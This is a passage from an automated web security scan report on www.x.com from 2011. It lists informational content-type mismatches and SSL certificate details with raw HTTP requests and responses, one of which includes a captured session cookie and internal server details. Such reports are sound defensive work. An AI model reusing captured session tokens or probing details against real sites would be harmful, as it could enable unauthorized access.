Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:50:30 GMT
Cache-Control: max-age=60
Content-Type: text/plain
Content-Length: 810
JP: D=267 t=1313114368350872
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (Clearvote == null) var Clearvot
...[SNIP]...

13.2. https://www.x.com/opensearch.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.x.com
Path:   /opensearch.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: application/opensearchdescription+xml;charset=UTF-8

The response states that it contains script. However, it actually appears to contain XML.

Request

GET /opensearch.xml HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:07 GMT
Server: Apache-Coyote/1.1
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Vary: User-Agent
JP: D=2678 t=1313157007976957
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>X Developer Network</ShortName>
<Description>Search X Developer Network</D
...[SNIP]...

13.3. https://www.x.com/view-video-short.jspa

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.x.com
Path:   /view-video-short.jspa

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /view-video-short.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 50
Vary: User-Agent
JP: D=5433 t=1313157226253277
Cache-Control: no-cache, private
Connection: close

There was an error loading that video information.

14. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.x.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Tue Apr 12 18:00:00 GMT-06:00 2011
Valid to:  Tue May 07 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Fri Aug 12 09:27:09 GMT-06:00 2011.